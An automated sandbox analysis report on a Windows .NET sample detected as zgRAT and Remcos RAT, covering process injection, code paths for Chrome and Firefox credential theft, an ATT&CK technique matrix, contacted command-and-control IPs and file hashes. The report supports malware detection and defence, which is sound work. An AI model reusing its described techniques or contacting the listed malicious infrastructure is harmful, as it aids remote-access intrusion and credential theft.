              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00418186 mouse_event,4_2_00418186
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000F32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerW9\
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,4_2_0044716D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00450558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_004507D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_0045081B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_004508B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00450943
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,4_2_00450B93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,4_2_00446C84
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00450CBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,4_2_00450DC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,4_2_0040EE14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00450E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0043354D cpuid 4_2_0043354D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00404F31 GetLocalTime,CreateEventA,CreateThread,4_2_00404F31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00447A10 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_00447A10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041A168 GetUserNameW,4_2_0041A168

              Stealing of Sensitive Information

              barindex
              Yara detected zgRAT
              Source: Yara matchFile source: file.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPE
              Yara detected Remcos RAT
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \key3.db4_2_0040B0AA
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040AF8C

              Remote Access Functionality

              barindex
              Yara detected zgRAT
              Source: Yara matchFile source: file.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPE
              Yara detected Remcos RAT
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: cmd.exe4_2_0040567A

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API              		1
              Windows Service              		1
              Bypass User Access Control              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		Exfiltration Over Other Network Medium12
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol11
              Input Capture              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Service Execution              		Logon Script (Windows)1
              Windows Service              		3
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares12
              Clipboard Data              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)322
              Process Injection              		22
              Software Packing              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets33
              System Information Discovery              		SSHKeyloggingData Transfer Size Limits12
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Bypass User Access Control              		Cached Domain Credentials21
              Security Software Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Masquerading              		DCSync21
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
              Virtualization/Sandbox Evasion              		Proc Filesystem3
              Process Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)322
              Process Injection              		Network Sniffing1
              Remote System Discovery              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe35%ReversingLabsWin64.Trojan.Cerbu
              file.exe46%VirustotalBrowse
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              geoplugin.net1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gples80%Avira URL Cloudsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              http://geoplugin.net/j0%URL Reputationsafe
              http://geoplugin.net/json.gp2C9DCABD6423689A465F00D4F0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp10%Avira URL Cloudsafe
              http://geoplugin.net/json.gprol0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpESS0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpf0%Avira URL Cloudsafe
              127.0.0.10%Avira URL Cloudsafe
              http://geoplugin.net/json.gpf0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              127.0.0.1true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gples8aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gprolaspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gp1aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gp2C9DCABD6423689A465F00D4Faspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gpfaspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gp/Cfile.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://geoplugin.net/json.gpESSaspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/jaspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              185.65.134.166
              		unknownSweden
              		39351ESAB-ASSEtrue
              178.237.33.50
              		geoplugin.netNetherlands
              		8455ATOM86-ASATOM86NLfalse
              45.128.234.54
              		unknownUnited Kingdom
              		208861RACKTECHRUtrue

              Private

              IP
              10.11.0.5
              127.0.0.1

              General Information

              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:882705
              Start date and time:2023-06-06 17:16:58 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 9m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@9/2@1/5
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 83.7% (good quality ratio 79.2%)
              • Quality average: 83.6%
              • Quality standard deviation: 26.6%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 74
              • Number of non-executed functions: 187
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Execution Graph export aborted for target file.exe, PID 3852 because it is empty
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.65.134.166OHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                skAnwRDuvH.exeGet hashmaliciousRemcosBrowse
                  178.237.33.50file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  SecuriteInfo.com.Variant.MSILHeracles.84870.1065.31623.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  xkDoqBXNzJWd.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  xIqZWtGFmnyy.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  xjo5OvtmzQLO.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  skihejsene.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  INVOICE.213557783.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  31883190ELECTRICAL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  DocumentsDOC03029314B76858448A444B4C03EEC7E6FB5554.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  2023-02-06_09958758993008RC08838_xls.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  file.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  j8hNdiX5mu.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Modis_list.xlsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  w25K2LiB53.rtfGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  RocEMw085M.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  INVOICE.213223421.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  HKL.vbsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Modis_list.docx.docGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  OHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.netfile.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  SecuriteInfo.com.Variant.MSILHeracles.84870.1065.31623.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  xkDoqBXNzJWd.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  xIqZWtGFmnyy.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  xjo5OvtmzQLO.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  skihejsene.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  INVOICE.213557783.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  31883190ELECTRICAL.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  DocumentsDOC03029314B76858448A444B4C03EEC7E6FB5554.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  2023-02-06_09958758993008RC08838_xls.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  file.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  file.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  j8hNdiX5mu.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Modis_list.xlsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  w25K2LiB53.rtfGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  RocEMw085M.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  INVOICE.213223421.pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  HKL.vbsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Modis_list.docx.docGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  OHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ESAB-ASSEOHGL8K58GL.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.166
                  08827299.exeGet hashmaliciousQuasarBrowse
                  • 185.65.134.175
                  skAnwRDuvH.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.166
                  scan_doc_007393033_pdf.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  scan_Image0820022023-04-22.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  Halkbank_Ekstre_01.03_(1).exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.167
                  00yK2P5hKs.elfGet hashmaliciousMiraiBrowse
                  • 185.65.133.229
                  562720_docx.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  INV-0520232.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.165
                  SOA_pdf.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.182
                  dWOq0x5uy7.exeGet hashmaliciousAsyncRATBrowse
                  • 185.213.155.163
                  10029020.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.164
                  SecuriteInfo.com.Trojan.PWS.Siggen3.25377.1163.11838.exeGet hashmaliciousRemcosBrowse
                  • 185.65.134.164
                  30e0aa68e3248e80101473ca6f1158dd93b4e1aba1e48.exeGet hashmaliciousRedLineBrowse
                  • 185.65.134.165
                  1.exeGet hashmaliciousBitRATBrowse
                  • 185.65.134.182
                  1.exeGet hashmaliciousBitRATBrowse
                  • 185.65.134.182
                  9WDxWYPBQq.elfGet hashmaliciousMiraiBrowse
                  • 185.65.133.203
                  tempfolder4561.exeGet hashmaliciousNjratBrowse
                  • 193.32.127.236
                  C9A7EE7FB9A3A7E662CB56948774E10995E7C5B465DF4.exeGet hashmaliciousNanocoreBrowse
                  • 185.65.134.179
                  mipselGet hashmaliciousMiraiBrowse
                  • 185.65.133.233

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):226
                  Entropy (8bit):5.354940450065058
                  Encrypted:false
                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                  MD5:B10E37251C5B495643F331DB2EEC3394
                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\json[1].json

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):944
                  Entropy (8bit):4.990870805423288
                  Encrypted:false
                  SSDEEP:12:tkEI7nd6CsGkMyGWKyMPVGADRPrmai+H0mGdAPORkoao9W7im51w7CSD9pF6RjSu:qHdRNuKyM8kzst7266m7RJaCo
                  MD5:F415E2ACABAFB737E34EA7C1A7E9AE08
                  SHA1:6CFEF6515535A0D3820C8F9B0C1882DC0D47F808
                  SHA-256:97ABDE670EC722AA8D24DBB5DCA416ECF3AFC766FD627A4831E00E52855435D1
                  SHA-512:B8DDB221554A642E08539C8E63D916773C26D37078AC3B4E3A96CA54C7F4391349FFD069E8B01C820B8E0D7968EE21CAF24AFFD07EA40B208214C68530BEB5E9
                  Malicious:false
                  Preview:{. "geoplugin_request":"102.129.143.77",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Hunenberg",. "geoplugin_region":"Zug",. "geoplugin_regionCode":"ZG",. "geoplugin_regionName":"Zug",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.173",. "geoplugin_longitude":"8.4204",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9045.}

                  Static File Info

                  General

                  File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.504178499744059
                  TrID:
                  • Win64 Executable GUI Net Framework (217006/5) 49.88%
                  • Win64 Executable GUI (202006/5) 46.43%
                  • Win64 Executable (generic) (12005/4) 2.76%
                  • Generic Win/DOS Executable (2004/3) 0.46%
                  • DOS Executable Generic (2002/1) 0.46%
                  File name:file.exe
                  File size:585216
                  MD5:58a91896eaf6efe03ffe6ebb7b731792
                  SHA1:e3ec7807b22e91e887dd1bc752c426041607216f
                  SHA256:dc984e3a8de291d49bab5940b8f8047d2a7d8f0dab4231342c36edcee9cbb92e
                  SHA512:9c764a0ec4d5f628fe998d90836fe39b2e112ebb21dc97e323c5ef0e50d6790ed36b5d89609c4aa4be2a5aaf6f4859e6e5a70150ce8b446868189417d9dffc23
                  SSDEEP:12288:OBm+u0O5pDETlQ6ocFa59nBTDvdeLu3jaLWGaGAXd:uzAgQ6Y59hDvdeLuTwK
                  TLSH:CEC4BF4A776AD46ED28D673BC6C50814A7A0DD82E30BDB4630C727994D0F3A7DF0929B
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...S.................0.................. ....@...... .......................@............`...@......@............... .....

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0x400000
                  Entrypoint Section:
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0xEACDEA53 [Sun Oct 31 11:36:51 2094 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:

                  Entrypoint Preview

                  Instruction
                  dec ebp
                  pop edx
                  nop
                  add byte ptr [ebx], al
                  add byte ptr [eax], al
                  add byte ptr [eax+eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x5a8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x903f20x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x8e4400x8e600False0.7875963701712028data7.511239938683684IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x920000x5a80x600False0.419921875data4.123920436980398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x920a00x31cdata
                  RT_MANIFEST0x923bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jun 6, 2023 17:18:06.283744097 CEST4969355433192.168.2.4185.65.134.166
                  Jun 6, 2023 17:18:09.289627075 CEST4969355433192.168.2.4185.65.134.166
                  Jun 6, 2023 17:18:15.290169954 CEST4969355433192.168.2.4185.65.134.166
